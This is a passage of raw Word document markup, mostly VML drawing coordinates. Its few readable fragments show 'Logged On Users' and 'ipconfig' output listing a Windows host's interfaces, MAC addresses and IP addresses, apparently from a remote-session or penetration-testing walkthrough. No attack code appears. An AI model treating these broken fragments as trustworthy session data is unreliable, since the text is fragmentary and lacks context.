2545,7072,2545,7071,2545,7070,2545,7069,2545,7067,2545,7066,2545,7065,2545,7063,2545,7061,2545,7060,2545,7058,2545,7056,2545,7055,2545,7053,2545,7051,2545,7049,2545,7047,2545,7045,2545,7043,2545,7041,2545,7038,2545,7036,2545,7034,2545,7031,2545,7029,2545,7026,2545,7023,2545,7021,2545,7018,2545,7015,2545,7012,2545,7009,2545,7006,2545,7003,2545,7000,2545,6996,2545,6993,2545,6989,2545,6986,2545,6982,2545,6978,2545,6975,2545,6971,2545,6967,2545,6963,2545,6959,2545,6954,2545,6950,2545,6946,2545,6941,2545,6937,2545,6932,2545,6927,2545,6922,2545,6917,2545,6912,2545,6907,2545,6902,2545,6897,2545,6891,2545,6886,2545,6880,2545,6874,2545,6868,2545,6862,2545,6856,2545,6850,2545,6844,2545,6837e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:138.500pt;margin-top:340.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2770,6810" coordsize="250,270">
        <v:shape style="position:absolute;left:2770;top:6810;width:250;height:270" coordorigin="2770,6810" coordsize="250,270" path="m2785,6837l2785,6837,2785,6837,2785,6837,2785,6837,2785,6837,2785,6837,2785,6837,2785,6837,2785,6837,2786,6837,2786,6837,2786,6837,2786,6837,2786,6837,2786,6837,2786,6837,2786,6837,2786,6837,2786,6837,2786,6837,2787,6837,2787,6837,2787,6837,2787,6837,2787,6837,2788,6837,2788,6837,2788,6837,2789,6837,2789,6837,2789,6837,2790,6837,2790,6837,2791,6837,2791,6837,2792,6837,2792,6837,2793,6837,2793,6837,2794,6837,2795,6837,2795,6837,2796,6837,2797,6837,2798,6837,2798,6837,2799,6837,2800,6837,2801,6837,2802,6837,2803,6837,2804,6837,2805,6837,2807,6837,2808,6837,2809,6837,2810,6837,2812,6837,2813,6837,2815,6837,2816,6837,2818,6837,2819,6837,2821,6837,2823,6837,2825,6837,2826,6837,2828,6837,2830,6837,2832,6837,2834,6837,2836,6837,2839,6837,2841,6837,2843,6837,2846,6837,2848,6837,2850,6837,2853,6837,2856,6837,2858,6837,2861,6837,2864,6837,2867,6837,2870,6837,2873,6837,2876,6837,2879,6837,2883,6837,2886,6837,2889,6837,2893,6837,2896,6837,2900,6837,2904,6837,2908,6837,2911,6837,2915,6837,2920,6837,2924,6837,2928,6837,2932,6837,2937,6837,2941,6837,2946,6837,2950,6837,2955,6837,2960,6837,2965,6837,2970,6837,2975,6837,2980,6837,2986,6837,2991,6837,2997,6837,3002,6837,3008,6837,3014,6837,3020,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6838,3026,6838,3026,6838,3026,6838,3026,6838,3026,6838,3026,6838,3026,6838,3026,6838,3026,6838,3026,6838,3026,6838,3026,6839,3026,6839,3026,6839,3026,6839,3026,6840,3026,6840,3026,6840,3026,6840,3026,6841,3026,6841,3026,6842,3026,6842,3026,6842,3026,6843,3026,6843,3026,6844,3026,6845,3026,6845,3026,6846,3026,6846,3026,6847,3026,6848,3026,6849,3026,6849,3026,6850,3026,6851,3026,6852,3026,6853,3026,6854,3026,6855,3026,6856,3026,6858,3026,6859,3026,6860,3026,6861,3026,6863,3026,6864,3026,6865,3026,6867,3026,6869,3026,6870,3026,6872,3026,6874,3026,6875,3026,6877,3026,6879,3026,6881,3026,6883,3026,6885,3026,6887,3026,6889,3026,6892,3026,6894,3026,6896,3026,6899,3026,6901,3026,6904,3026,6907,3026,6909,3026,6912,3026,6915,3026,6918,3026,6921,3026,6924,3026,6927,3026,6930,3026,6934,3026,6937,3026,6941,3026,6944,3026,6948,3026,6952,3026,6955,3026,6959,3026,6963,3026,6967,3026,6971,3026,6976,3026,6980,3026,6984,3026,6989,3026,6993,3026,6998,3026,7003,3026,7008,3026,7013,3026,7018,3026,7023,3026,7028,3026,7034,3026,7039,3026,7044,3026,7050,3026,7056,3026,7062,3026,7068,3026,7074,3026,7080,3026,7086,3026,7093,3026,7093,3026,7093,3026,7093,3026,7093,3026,7093,3026,7093,3025,7093,3025,7093,3025,7093,3025,7093,3025,7093,3025,7093,3025,7093,3025,7093,3025,7093,3025,7093,3025,7093,3025,7093,3025,7093,3025,7093,3024,7093,3024,7093,3024,7093,3024,7093,3024,7093,3023,7093,3023,7093,3023,7093,3022,7093,3022,7093,3022,7093,3021,7093,3021,7093,3020,7093,3020,7093,3019,7093,3019,7093,3018,7093,3018,7093,3017,7093,3016,7093,3016,7093,3015,7093,3014,7093,3013,7093,3013,7093,3012,7093,3011,7093,3010,7093,3009,7093,3008,7093,3007,7093,3005,7093,3004,7093,3003,7093,3002,7093,3000,7093,2999,7093,2998,7093,2996,7093,2995,7093,2993,7093,2992,7093,2990,7093,2988,7093,2986,7093,2985,7093,2983,7093,2981,7093,2979,7093,2977,7093,2975,7093,2972,7093,2970,7093,2968,7093,2965,7093,2963,7093,2960,7093,2958,7093,2955,7093,2953,7093,2950,7093,2947,7093,2944,7093,2941,7093,2938,7093,2935,7093,2932,7093,2928,7093,2925,7093,2922,7093,2918,7093,2915,7093,2911,7093,2907,7093,2903,7093,2899,7093,2895,7093,2891,7093,2887,7093,2883,7093,2879,7093,2874,7093,2870,7093,2865,7093,2861,7093,2856,7093,2851,7093,2846,7093,2841,7093,2836,7093,2831,7093,2825,7093,2820,7093,2814,7093,2809,7093,2803,7093,2797,7093,2791,7093,2785,7093,2785,7093,2785,7093,2785,7093,2785,7093,2785,7093,2785,7093,2785,7093,2785,7093,2785,7092,2785,7092,2785,7092,2785,7092,2785,7092,2785,7092,2785,7092,2785,7092,2785,7092,2785,7092,2785,7092,2785,7092,2785,7091,2785,7091,2785,7091,2785,7091,2785,7090,2785,7090,2785,7090,2785,7090,2785,7089,2785,7089,2785,7088,2785,7088,2785,7088,2785,7087,2785,7087,2785,7086,2785,7086,2785,7085,2785,7084,2785,7084,2785,7083,2785,7082,2785,7081,2785,7081,2785,7080,2785,7079,2785,7078,2785,7077,2785,7076,2785,7075,2785,7074,2785,7072,2785,7071,2785,7070,2785,7069,2785,7067,2785,7066,2785,7065,2785,7063,2785,7061,2785,7060,2785,7058,2785,7056,2785,7055,2785,7053,2785,7051,2785,7049,2785,7047,2785,7045,2785,7043,2785,7041,2785,7038,2785,7036,2785,7034,2785,7031,2785,7029,2785,7026,2785,7023,2785,7021,2785,7018,2785,7015,2785,7012,2785,7009,2785,7006,2785,7003,2785,7000,2785,6996,2785,6993,2785,6989,2785,6986,2785,6982,2785,6978,2785,6975,2785,6971,2785,6967,2785,6963,2785,6959,2785,6954,2785,6950,2785,6946,2785,6941,2785,6937,2785,6932,2785,6927,2785,6922,2785,6917,2785,6912,2785,6907,2785,6902,2785,6897,2785,6891,2785,6886,2785,6880,2785,6874,2785,6868,2785,6862,2785,6856,2785,6850,2785,6844,2785,6837e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:340.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,6810" coordsize="250,270">
        <v:shape style="position:absolute;left:3010;top:6810;width:250;height:270" coordorigin="3010,6810" coordsize="250,270" path="m3026,6837l3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3026,6837,3027,6837,3027,6837,3027,6837,3027,6837,3027,6837,3027,6837,3028,6837,3028,6837,3028,6837,3029,6837,3029,6837,3029,6837,3030,6837,3030,6837,3031,6837,3031,6837,3032,6837,3032,6837,3033,6837,3033,6837,3034,6837,3035,6837,3035,6837,3036,6837,3037,6837,3038,6837,3039,6837,3039,6837,3040,6837,3041,6837,3042,6837,3043,6837,3044,6837,3046,6837,3047,6837,3048,6837,3049,6837,3051,6837,3052,6837,3053,6837,3055,6837,3056,6837,3058,6837,3059,6837,3061,6837,3063,6837,3065,6837,3066,6837,3068,6837,3070,6837,3072,6837,3074,6837,3077,6837,3079,6837,3081,6837,3083,6837,3086,6837,3088,6837,3091,6837,3093,6837,3096,6837,3098,6837,3101,6837,3104,6837,3107,6837,3110,6837,3113,6837,3116,6837,3119,6837,3123,6837,3126,6837,3129,6837,3133,6837,3136,6837,3140,6837,3144,6837,3148,6837,3152,6837,3156,6837,3160,6837,3164,6837,3168,6837,3172,6837,3177,6837,3181,6837,3186,6837,3190,6837,3195,6837,3200,6837,3205,6837,3210,6837,3215,6837,3220,6837,3226,6837,3231,6837,3237,6837,3242,6837,3248,6837,3254,6837,3260,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6838,3266,6838,3266,6838,3266,6838,3266,6838,3266,6838,3266,6838,3266,6838,3266,6838,3266,6838,3266,6838,3266,6838,3266,6839,3266,6839,3266,6839,3266,6839,3266,6840,3266,6840,3266,6840,3266,6840,3266,6841,3266,6841,3266,6842,3266,6842,3266,6842,3266,6843,3266,6843,3266,6844,3266,6845,3266,6845,3266,6846,3266,6846,3266,6847,3266,6848,3266,6849,3266,6849,3266,6850,3266,6851,3266,6852,3266,6853,3266,6854,3266,6855,3266,6856,3266,6858,3266,6859,3266,6860,3266,6861,3266,6863,3266,6864,3266,6865,3266,6867,3266,6869,3266,6870,3266,6872,3266,6874,3266,6875,3266,6877,3266,6879,3266,6881,3266,6883,3266,6885,3266,6887,3266,6889,3266,6892,3266,6894,3266,6896,3266,6899,3266,6901,3266,6904,3266,6907,3266,6909,3266,6912,3266,6915,3266,6918,3266,6921,3266,6924,3266,6927,3266,6930,3266,6934,3266,6937,3266,6941,3266,6944,3266,6948,3266,6952,3266,6955,3266,6959,3266,6963,3266,6967,3266,6971,3266,6976,3266,6980,3266,6984,3266,6989,3266,6993,3266,6998,3266,7003,3266,7008,3266,7013,3266,7018,3266,7023,3266,7028,3266,7034,3266,7039,3266,7044,3266,7050,3266,7056,3266,7062,3266,7068,3266,7074,3266,7080,3266,7086,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3265,7093,3265,7093,3265,7093,3265,7093,3265,7093,3265,7093,3265,7093,3265,7093,3265,7093,3265,7093,3264,7093,3264,7093,3264,7093,3264,7093,3263,7093,3263,7093,3263,7093,3263,7093,3262,7093,3262,7093,3261,7093,3261,7093,3261,7093,3260,7093,3260,7093,3259,7093,3258,7093,3258,7093,3257,7093,3257,7093,3256,7093,3255,7093,3254,7093,3254,7093,3253,7093,3252,7093,3251,7093,3250,7093,3249,7093,3248,7093,3247,7093,3246,7093,3244,7093,3243,7093,3242,7093,3241,7093,3239,7093,3238,7093,3236,7093,3235,7093,3233,7093,3232,7093,3230,7093,3228,7093,3227,7093,3225,7093,3223,7093,3221,7093,3219,7093,3217,7093,3215,7093,3212,7093,3210,7093,3208,7093,3206,7093,3203,7093,3201,7093,3198,7093,3195,7093,3193,7093,3190,7093,3187,7093,3184,7093,3181,7093,3178,7093,3175,7093,3172,7093,3169,7093,3165,7093,3162,7093,3158,7093,3155,7093,3151,7093,3147,7093,3143,7093,3140,7093,3136,7093,3132,7093,3127,7093,3123,7093,3119,7093,3114,7093,3110,7093,3105,7093,3101,7093,3096,7093,3091,7093,3086,7093,3081,7093,3076,7093,3071,7093,3065,7093,3060,7093,3055,7093,3049,7093,3043,7093,3037,7093,3032,7093,3026,7093,3026,7093,3026,7093,3026,7093,3026,7093,3026,7093,3026,7093,3026,7093,3026,7093,3026,7092,3026,7092,3026,7092,3026,7092,3026,7092,3026,7092,3026,7092,3026,7092,3026,7092,3026,7092,3026,7092,3026,7092,3026,7091,3026,7091,3026,7091,3026,7091,3026,7090,3026,7090,3026,7090,3026,7090,3026,7089,3026,7089,3026,7088,3026,7088,3026,7088,3026,7087,3026,7087,3026,7086,3026,7086,3026,7085,3026,7084,3026,7084,3026,7083,3026,7082,3026,7081,3026,7081,3026,7080,3026,7079,3026,7078,3026,7077,3026,7076,3026,7075,3026,7074,3026,7072,3026,7071,3026,7070,3026,7069,3026,7067,3026,7066,3026,7065,3026,7063,3026,7061,3026,7060,3026,7058,3026,7056,3026,7055,3026,7053,3026,7051,3026,7049,3026,7047,3026,7045,3026,7043,3026,7041,3026,7038,3026,7036,3026,7034,3026,7031,3026,7029,3026,7026,3026,7023,3026,7021,3026,7018,3026,7015,3026,7012,3026,7009,3026,7006,3026,7003,3026,7000,3026,6996,3026,6993,3026,6989,3026,6986,3026,6982,3026,6978,3026,6975,3026,6971,3026,6967,3026,6963,3026,6959,3026,6954,3026,6950,3026,6946,3026,6941,3026,6937,3026,6932,3026,6927,3026,6922,3026,6917,3026,6912,3026,6907,3026,6902,3026,6897,3026,6891,3026,6886,3026,6880,3026,6874,3026,6868,3026,6862,3026,6856,3026,6850,3026,6844,3026,6837e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:162.500pt;margin-top:340.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3250,6810" coordsize="250,270">
        <v:shape style="position:absolute;left:3250;top:6810;width:250;height:270" coordorigin="3250,6810" coordsize="250,270" path="m3266,6837l3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3266,6837,3267,6837,3267,6837,3267,6837,3267,6837,3267,6837,3268,6837,3268,6837,3268,6837,3268,6837,3269,6837,3269,6837,3269,6837,3270,6837,3270,6837,3271,6837,3271,6837,3272,6837,3272,6837,3273,6837,3273,6837,3274,6837,3275,6837,3275,6837,3276,6837,3277,6837,3278,6837,3279,6837,3280,6837,3280,6837,3281,6837,3282,6837,3283,6837,3285,6837,3286,6837,3287,6837,3288,6837,3289,6837,3291,6837,3292,6837,3293,6837,3295,6837,3296,6837,3298,6837,3300,6837,3301,6837,3303,6837,3305,6837,3307,6837,3309,6837,3310,6837,3312,6837,3315,6837,3317,6837,3319,6837,3321,6837,3323,6837,3326,6837,3328,6837,3331,6837,3333,6837,3336,6837,3339,6837,3341,6837,3344,6837,3347,6837,3350,6837,3353,6837,3356,6837,3359,6837,3363,6837,3366,6837,3370,6837,3373,6837,3377,6837,3380,6837,3384,6837,3388,6837,3392,6837,3396,6837,3400,6837,3404,6837,3408,6837,3412,6837,3417,6837,3421,6837,3426,6837,3431,6837,3435,6837,3440,6837,3445,6837,3450,6837,3455,6837,3461,6837,3466,6837,3471,6837,3477,6837,3482,6837,3488,6837,3494,6837,3500,6837,3506,6837,3506,6837,3506,6837,3506,6837,3506,6837,3506,6837,3506,6837,3506,6837,3506,6837,3506,6838,3506,6838,3506,6838,3506,6838,3506,6838,3506,6838,3506,6838,3506,6838,3506,6838,3506,6838,3506,6838,3506,6838,3506,6839,3506,6839,3506,6839,3506,6839,3506,6840,3506,6840,3506,6840,3506,6840,3506,6841,3506,6841,3506,6842,3506,6842,3506,6842,3506,6843,3506,6843,3506,6844,3506,6845,3506,6845,3506,6846,3506,6846,3506,6847,3506,6848,3506,6849,3506,6849,3506,6850,3506,6851,3506,6852,3506,6853,3506,6854,3506,6855,3506,6856,3506,6858,3506,6859,3506,6860,3506,6861,3506,6863,3506,6864,3506,6865,3506,6867,3506,6869,3506,6870,3506,6872,3506,6874,3506,6875,3506,6877,3506,6879,3506,6881,3506,6883,3506,6885,3506,6887,3506,6889,3506,6892,3506,6894,3506,6896,3506,6899,3506,6901,3506,6904,3506,6907,3506,6909,3506,6912,3506,6915,3506,6918,3506,6921,3506,6924,3506,6927,3506,6930,3506,6934,3506,6937,3506,6941,3506,6944,3506,6948,3506,6952,3506,6955,3506,6959,3506,6963,3506,6967,3506,6971,3506,6976,3506,6980,3506,6984,3506,6989,3506,6993,3506,6998,3506,7003,3506,7008,3506,7013,3506,7018,3506,7023,3506,7028,3506,7034,3506,7039,3506,7044,3506,7050,3506,7056,3506,7062,3506,7068,3506,7074,3506,7080,3506,7086,3506,7093,3506,7093,3506,7093,3506,7093,3506,7093,3506,7093,3506,7093,3506,7093,3506,7093,3506,7093,3506,7093,3506,7093,3506,7093,3506,7093,3505,7093,3505,7093,3505,7093,3505,7093,3505,7093,3505,7093,3505,7093,3505,7093,3504,7093,3504,7093,3504,7093,3504,7093,3504,7093,3503,7093,3503,7093,3503,7093,3502,7093,3502,7093,3502,7093,3501,7093,3501,7093,3500,7093,3500,7093,3499,7093,3499,7093,3498,7093,3497,7093,3497,7093,3496,7093,3495,7093,3494,7093,3494,7093,3493,7093,3492,7093,3491,7093,3490,7093,3489,7093,3488,7093,3487,7093,3486,7093,3485,7093,3483,7093,3482,7093,3481,7093,3479,7093,3478,7093,3477,7093,3475,7093,3473,7093,3472,7093,3470,7093,3468,7093,3467,7093,3465,7093,3463,7093,3461,7093,3459,7093,3457,7093,3455,7093,3453,7093,3450,7093,3448,7093,3446,7093,3443,7093,3441,7093,3438,7093,3436,7093,3433,7093,3430,7093,3427,7093,3424,7093,3421,7093,3418,7093,3415,7093,3412,7093,3409,7093,3405,7093,3402,7093,3398,7093,3395,7093,3391,7093,3387,7093,3384,7093,3380,7093,3376,7093,3372,7093,3368,7093,3363,7093,3359,7093,3355,7093,3350,7093,3345,7093,3341,7093,3336,7093,3331,7093,3326,7093,3321,7093,3316,7093,3311,7093,3306,7093,3300,7093,3295,7093,3289,7093,3283,7093,3278,7093,3272,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7093,3266,7092,3266,7092,3266,7092,3266,7092,3266,7092,3266,7092,3266,7092,3266,7092,3266,7092,3266,7092,3266,7092,3266,7092,3266,7091,3266,7091,3266,7091,3266,7091,3266,7090,3266,7090,3266,7090,3266,7090,3266,7089,3266,7089,3266,7088,3266,7088,3266,7088,3266,7087,3266,7087,3266,7086,3266,7086,3266,7085,3266,7084,3266,7084,3266,7083,3266,7082,3266,7081,3266,7081,3266,7080,3266,7079,3266,7078,3266,7077,3266,7076,3266,7075,3266,7074,3266,7072,3266,7071,3266,7070,3266,7069,3266,7067,3266,7066,3266,7065,3266,7063,3266,7061,3266,7060,3266,7058,3266,7056,3266,7055,3266,7053,3266,7051,3266,7049,3266,7047,3266,7045,3266,7043,3266,7041,3266,7038,3266,7036,3266,7034,3266,7031,3266,7029,3266,7026,3266,7023,3266,7021,3266,7018,3266,7015,3266,7012,3266,7009,3266,7006,3266,7003,3266,7000,3266,6996,3266,6993,3266,6989,3266,6986,3266,6982,3266,6978,3266,6975,3266,6971,3266,6967,3266,6963,3266,6959,3266,6954,3266,6950,3266,6946,3266,6941,3266,6937,3266,6932,3266,6927,3266,6922,3266,6917,3266,6912,3266,6907,3266,6902,3266,6897,3266,6891,3266,6886,3266,6880,3266,6874,3266,6868,3266,6862,3266,6856,3266,6850,3266,6844,3266,6837e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:216.500pt;margin-top:359.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4330,7190" coordsize="130,270">
        <v:shape style="position:absolute;left:4330;top:7190;width:130;height:270" coordorigin="4330,7190" coordsize="130,270" path="m4346,7213l4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4346,7213,4347,7213,4347,7213,4347,7213,4347,7213,4347,7213,4347,7213,4347,7213,4347,7213,4347,7213,4347,7213,4348,7213,4348,7213,4348,7213,4348,7213,4348,7213,4349,7213,4349,7213,4349,7213,4349,7213,4350,7213,4350,7213,4350,7213,4350,7213,4351,7213,4351,7213,4351,7213,4352,7213,4352,7213,4353,7213,4353,7213,4354,7213,4354,7213,4355,7213,4355,7213,4356,7213,4356,7213,4357,7213,4357,7213,4358,7213,4359,7213,4359,7213,4360,7213,4361,7213,4362,7213,4362,7213,4363,7213,4364,7213,4365,7213,4366,7213,4367,7213,4368,7213,4369,7213,4370,7213,4371,7213,4372,7213,4373,7213,4374,7213,4375,7213,4376,7213,4377,7213,4379,7213,4380,7213,4381,7213,4383,7213,4384,7213,4385,7213,4387,7213,4388,7213,4390,7213,4392,7213,4393,7213,4395,7213,4396,7213,4398,7213,4400,7213,4402,7213,4403,7213,4405,7213,4407,7213,4409,7213,4411,7213,4413,7213,4415,7213,4417,7213,4420,7213,4422,7213,4424,7213,4426,7213,4429,7213,4431,7213,4433,7213,4436,7213,4438,7213,4441,7213,4444,7213,4446,7213,4449,7213,4452,7213,4455,7213,4457,7213,4460,7213,4463,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7213,4466,7214,4466,7214,4466,7214,4466,7214,4466,7214,4466,7214,4466,7215,4466,7215,4466,7215,4466,7216,4466,7216,4466,7216,4466,7217,4466,7217,4466,7218,4466,7218,4466,7219,4466,7219,4466,7220,4466,7220,4466,7221,4466,7222,4466,7222,4466,7223,4466,7224,4466,7225,4466,7226,4466,7226,4466,7227,4466,7228,4466,7229,4466,7230,4466,7232,4466,7233,4466,7234,4466,7235,4466,7236,4466,7238,4466,7239,4466,7241,4466,7242,4466,7244,4466,7245,4466,7247,4466,7249,4466,7250,4466,7252,4466,7254,4466,7256,4466,7258,4466,7260,4466,7262,4466,7265,4466,7267,4466,7269,4466,7272,4466,7274,4466,7277,4466,7279,4466,7282,4466,7284,4466,7287,4466,7290,4466,7293,4466,7296,4466,7299,4466,7302,4466,7306,4466,7309,4466,7312,4466,7316,4466,7319,4466,7323,4466,7327,4466,7331,4466,7334,4466,7338,4466,7342,4466,7347,4466,7351,4466,7355,4466,7360,4466,7364,4466,7369,4466,7373,4466,7378,4466,7383,4466,7388,4466,7393,4466,7398,4466,7403,4466,7409,4466,7414,4466,7420,4466,7425,4466,7431,4466,7437,4466,7443,4466,7449,4466,7455,4466,7461,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4466,7468,4465,7468,4465,7468,4465,7468,4465,7468,4465,7468,4465,7468,4465,7468,4465,7468,4464,7468,4464,7468,4464,7468,4464,7468,4463,7468,4463,7468,4463,7468,4463,7468,4462,7468,4462,7468,4462,7468,4461,7468,4461,7468,4461,7468,4460,7468,4460,7468,4459,7468,4459,7468,4458,7468,4458,7468,4457,7468,4457,7468,4456,7468,4456,7468,4455,7468,4454,7468,4454,7468,4453,7468,4452,7468,4452,7468,4451,7468,4450,7468,4449,7468,4448,7468,4448,7468,4447,7468,4446,7468,4445,7468,4444,7468,4443,7468,4442,7468,4441,7468,4440,7468,4439,7468,4437,7468,4436,7468,4435,7468,4434,7468,4432,7468,4431,7468,4430,7468,4428,7468,4427,7468,4426,7468,4424,7468,4422,7468,4421,7468,4419,7468,4418,7468,4416,7468,4414,7468,4413,7468,4411,7468,4409,7468,4407,7468,4405,7468,4403,7468,4401,7468,4399,7468,4397,7468,4395,7468,4393,7468,4391,7468,4388,7468,4386,7468,4384,7468,4381,7468,4379,7468,4377,7468,4374,7468,4371,7468,4369,7468,4366,7468,4363,7468,4361,7468,4358,7468,4355,7468,4352,7468,4349,7468,4346,7468,4346,7468,4346,7468,4346,7468,4346,7468,4346,7468,4346,7468,4346,7468,4346,7468,4346,7468,4346,7468,4346,7468,4346,7468,4346,7467,4346,7467,4346,7467,4346,7467,4346,7467,4346,7467,4346,7467,4346,7467,4346,7467,4346,7466,4346,7466,4346,7466,4346,7466,4346,7465,4346,7465,4346,7465,4346,7464,4346,7464,4346,7464,4346,7463,4346,7463,4346,7462,4346,7462,4346,7461,4346,7461,4346,7460,4346,7459,4346,7459,4346,7458,4346,7457,4346,7457,4346,7456,4346,7455,4346,7454,4346,7453,4346,7452,4346,7451,4346,7450,4346,7449,4346,7448,4346,7446,4346,7445,4346,7444,4346,7443,4346,7441,4346,7440,4346,7438,4346,7437,4346,7435,4346,7433,4346,7432,4346,7430,4346,7428,4346,7426,4346,7424,4346,7422,4346,7420,4346,7418,4346,7416,4346,7414,4346,7411,4346,7409,4346,7406,4346,7404,4346,7401,4346,7399,4346,7396,4346,7393,4346,7390,4346,7387,4346,7384,4346,7381,4346,7378,4346,7375,4346,7371,4346,7368,4346,7365,4346,7361,4346,7357,4346,7354,4346,7350,4346,7346,4346,7342,4346,7338,4346,7334,4346,7330,4346,7325,4346,7321,4346,7316,4346,7312,4346,7307,4346,7302,4346,7297,4346,7292,4346,7287,4346,7282,4346,7277,4346,7272,4346,7266,4346,7261,4346,7255,4346,7249,4346,7243,4346,7238,4346,7231,4346,7225,4346,7219,4346,7213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Logged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On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Users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windows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7102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ipconfig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18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Interface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980053"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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Software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Loopback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Interface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11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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Hardware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MAC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00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00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00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MTU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4294967295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IPv4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127.0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.0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.1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IPv4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Netmask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255.0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.0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.0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IPv6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1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326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IPv6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Netmask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ffff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28</w:t>
      </w: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29</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="12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Interface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980053"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>11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==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Intel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R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PRO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1000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Network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Connection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Hardware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MAC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0c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29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bc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0d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5c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8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9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MTU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980053"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1500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IPv4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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.2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36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IPv4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Netmask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255.255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.255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.0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37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IPv6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Address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fe80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5582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70c8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a5a8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8223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5421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IPv6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Netmask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ffff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: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39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564.759pt;width:0.0pt;height:277.240pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,11295" coordsize="0,5544">
        <v:shape style="position:absolute;left:10402;top:11295;width:0;height:5544" coordorigin="10402,11295" coordsize="0,5544" path="m10402,11295l10402,11295,10402,11295,10402,11295,10402,11295,10402,11295,10402,11295,10402,11295,10402,11296,10402,11296,10402,11297,10402,11298,10402,11299,10402,11300,10402,11302,10402,11304,10402,11306,10402,11308,10402,11311,10402,11314,10402,11317,10402,11321,10402,11325,10402,11330,10402,11335,10402,11340,10402,11346,10402,11353,10402,11359,10402,11367,10402,11375,10402,11384,10402,11393,10402,11403,10402,11413,10402,11424,10402,11436,10402,11448,10402,11461,10402,11475,10402,11490,10402,11505,10402,11521,10402,11538,10402,11556,10402,11575,10402,11595,10402,11615,10402,11636,10402,11659,10402,11682,10402,11706,10402,11731,10402,11757,10402,11785,10402,11813,10402,11842,10402,11873,10402,11904,10402,11937,10402,11970,10402,12005,10402,12042,10402,12079,10402,12117,10402,12157,10402,12198,10402,12241,10402,12284,10402,12329,10402,12376,10402,12423,10402,12472,10402,12523,10402,12575,10402,12628,10402,12683,10402,12739,10402,12797,10402,12856,10402,12917,10402,12979,10402,13043,10402,13109,10402,13176,10402,13245,10402,13315,10402,13388,10402,13461,10402,13537,10402,13614,10402,13693,10402,13774,10402,13857,10402,13941,10402,14028,10402,14116,10402,14206,10402,14298,10402,14392,10402,14487,10402,14585,10402,14685,10402,14786,10402,14890,10402,14996,10402,15104,10402,15214,10402,15326,10402,15440,10402,15556,10402,15674,10402,15795,10402,15917,10402,16042,10402,16170,10402,16299,10402,16431,10402,16565,10402,16701,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:563.500pt;width:449.500pt;height:20.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,11270" coordsize="8990,410">
